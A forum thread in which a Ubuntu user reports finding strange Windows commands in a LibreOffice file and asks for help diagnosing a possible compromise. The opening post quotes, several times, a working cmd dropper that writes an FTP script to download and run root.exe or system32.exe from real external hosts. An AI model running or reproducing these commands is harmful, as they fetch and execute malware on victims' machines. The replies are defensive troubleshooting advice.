Page 1 of 2 12 LastLast
Results 1 to 10 of 15

Thread: Virus via Windows?

  1. #1
    Join Date
    Apr 2008
    Location
    Otago
    Beans
    962
    Distro
    Ubuntu 14.04 Trusty Tahr

    Virus via Windows?

    I am on Ubuntu 12.04 and using LO 3.5.4

    I woke up this morning to find this displayed on my PC in a LO write file:

    2011-12 Governor 21 >> ik &echo user alizametal.com.tr hd611 >> ik &echo binary >> ik &echo get www/root.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &root.exe &exit echo You got owned

    cmd /c echo open 89.19.29.116 21 >> ik &echo user alizametal.com.tr hd611 >> ik &echo binary >> ik &echo get www/root.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &root.exe &exit echo You got owned

    cmd /c echo open 89.19.29.116 21 >> ik &echo user alizametal.com.tr hd611 >> ik &echo binary >> ik &echo get www/root.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &root.exe &exit echo You got owned

    cmd /c echo open 89.19.29.116 21 >> ik &echo user alizametal.com.tr hd611 >> ik &echo binary >> ik &echo get www/root.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &root.exe &exit echo You got owned

    cmd /c echo open 89.19.29.116 21 >> ik &echo user alizametal.com.tr hd611 >> ik &echo binary >> ik &echo get www/root.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &root.exe &exit echo You got owned

    cmd /c echo open countx6.servegame.com 21 >> ik &echo user nobody lampp >> ik &echo binary >> ik &echo get system32.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &system32.exe &exit echo Windows has been updated.

    Parts of this kept appearing in strange places on documents I was working on yesterday...I recognise some of it.

    It is obviously some kind of Windows virus and is interfering with LO......

    a) where does it hide b) how can I eliminate it c) how can I ensure it does not get passed on to Windows users?
    Ubuntu is computer speak for defenestration

  2. #2
    Join Date
    Jun 2007
    Location
    Arizona, USA
    Beans
    223
    Distro
    Lubuntu 12.10 Quantal Quetzal

    Re: Virus via Windows?

    You didn't mention if you are running or have disabled macros. That's the first place to look for bad guys coming out of the MSFT Office into the Libre Office.
    Last edited by uRock; September 5th, 2012 at 06:00 AM. Reason: MSFT
    The future will soon be a thing of the past.

  3. #3
    Join Date
    Feb 2010
    Location
    Land of Confusion
    Beans
    8,400
    Distro
    Ubuntu 16.04 Xenial Xerus

    Re: Virus via Windows?

    Moved to Security Discussions.

  4. #4
    Join Date
    Apr 2008
    Location
    Otago
    Beans
    962
    Distro
    Ubuntu 14.04 Trusty Tahr

    Re: Virus via Windows?

    Quote Originally Posted by Guilden_NL View Post
    You didn't mention if you are running or have disabled macros. That's the first place to look for bad guys coming out of the MSFT Office into the Libre Office.
    There is very high probability that this virus came via a docx file. I have macros enabled, but on High Security level...I have looked in the macros folders for the write file that was opened on my PC and contained the above...but there is no obvious macro that contains these commands.
    Last edited by dunbrokin; September 5th, 2012 at 06:43 AM.
    Ubuntu is computer speak for defenestration

  5. #5
    Join Date
    Apr 2008
    Location
    Otago
    Beans
    962
    Distro
    Ubuntu 14.04 Trusty Tahr

    Re: Virus via Windows?

    This morning when I went to my machine, I saw that the remote viewer was active (which is very strange indeed) and that it was connected to a site beginning with 77.xx.xx.xx - I was so shocked (and assumed that I have been breached) that I clicked off the remote viewer without recording what the site it was connected to was.....is there a way that I can find, in the logs maybe, what that site IP is?

    It aslo looks from the logs that there was a su command by nobody....and as nobody appears in the script above, I am wondering if that su command was issued by the virus. How would I know if su command was accepted by root or not i.e. whether my password has been breached and access has been granted to my files?

    Here from my log:

    Aug 26 20:30:01 joan-HP-Mini-5102 CRON[26099]: pam_unix(cron:session): session closed for user root
    Aug 26 20:37:39 joan-HP-Mini-5102 su[26596]: Successful su for nobody by root
    Aug 26 20:37:39 joan-HP-Mini-5102 su[26596]: + ??? root:nobody
    Aug 26 20:37:39 joan-HP-Mini-5102 su[26596]: pam_unix(su:session): session opened for user nobody by (uid=0)
    Aug 26 20:38:53 joan-HP-Mini-5102 su[26596]: pam_unix(su:session): session closed for user nobody
    Aug 26 21:17:01 joan-HP-Mini-5102 CRON[27134]: pam_unix(cron:session): session opened for user root by (uid=0)
    Aug 26 21:17:01 joan-HP-Mini-5102 CRON[27134]: pam_unix(cron:session): session closed for user root
    Aug 26 22:17:01 joan-HP-Mini-5102 CRON[27419]: pam_unix(cron:session): session opened for user root by (uid=0)
    Last edited by dunbrokin; September 5th, 2012 at 10:43 PM.
    Ubuntu is computer speak for defenestration

  6. #6
    Join Date
    Jun 2007
    Location
    Porirua, New Zealand
    Beans
    Hidden!
    Distro
    Ubuntu

    Re: Virus via Windows?

    There are several sites I'm aware of that can help you find out interesting things about specific IP adresses, including who to complain to. There are often limits to what you can learn without the benefit of the co-operation of service providers, but at least its a start.

    One place to start might be http://whatismyipaddress.com/ip-lookup
    Last edited by lisati; September 6th, 2012 at 02:37 AM. Reason: Fix typo
    Forum DOs and DON'Ts
    Please use CODE tags
    Including your email address in a post is not recommended
    My Blog

  7. #7
    Join Date
    Apr 2008
    Location
    Otago
    Beans
    962
    Distro
    Ubuntu 14.04 Trusty Tahr

    Re: Virus via Windows?

    Quote Originally Posted by lisati View Post
    There are several sites I'm aware of that can help you find out interesting things about specific IP adresses, including who to complain to. There are often limits to what you can learn without the benefit the co-operation of service providers, but at least its a start.

    One place to start might be http://whatismyipaddress.com/ip-lookup
    Thanks for that...but first I need to know which IP it was connected to.
    Ubuntu is computer speak for defenestration

  8. #8
    Join Date
    Sep 2007
    Location
    Oklahoma, USA
    Beans
    2,362
    Distro
    Xubuntu 16.04 Xenial Xerus

    Re: Virus via Windows?

    You can look up that "89.19.29.116" IP address shown in your first post. Those lines form a (Windows-only) script that will connect to that site via FTP and download a file, presumably of malware, as "root.exe" and then subsequently execute and delete it.

    To locate that "77.x.x.x" IP you can search through /var/log/syslog and its older copies. These files will be large, but may contain references to IP addresses that can help you.

    The openings for root shown in your auth.log excerpt, that happen at 17 minutes past the hour, are normal cron.hourly tasks. The others, however, may be a bit suspicious.
    --
    Jim Kyle in Oklahoma, USA
    Linux Counter #259718
    Howto mark thread: https://wiki.ubuntu.com/UnansweredPo.../SolvedThreads

  9. #9
    Join Date
    Apr 2008
    Location
    Otago
    Beans
    962
    Distro
    Ubuntu 14.04 Trusty Tahr

    Re: Virus via Windows?

    Quote Originally Posted by JKyleOKC View Post
    You can look up that "89.19.29.116" IP address shown in your first post. Those lines form a (Windows-only) script that will connect to that site via FTP and download a file, presumably of malware, as "root.exe" and then subsequently execute and delete it.

    To locate that "77.x.x.x" IP you can search through /var/log/syslog and its older copies. These files will be large, but may contain references to IP addresses that can help you.

    The openings for root shown in your auth.log excerpt, that happen at 17 minutes past the hour, are normal cron.hourly tasks. The others, however, may be a bit suspicious.
    Thanks for that...I will search the /var/log/syslog as you suggest. What do people advise should be my next step?
    Ubuntu is computer speak for defenestration

  10. #10
    Join Date
    Apr 2008
    Location
    Otago
    Beans
    962
    Distro
    Ubuntu 14.04 Trusty Tahr

    Re: Virus via Windows?

    I have searched all the logs that I can find....but I cannot see anywhere an indication of when I connect to my machine using VPN or when I connect to other machines using VPN. Neither can I see any log of when my machine connects nightly to JungleDisk to do a backup. Where might these be?

    I have used the Tiger chkroot and that does not show anything sinister....so, I am beginning to suspect my suger-rushed imagination and am coming to the conclusion that, in all probability, I have not been compromised.

    However, I would still like to check out those logs to see where VPN and the JD conncection actually show.
    Ubuntu is computer speak for defenestration

Page 1 of 2 12 LastLast

Tags for this Thread

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •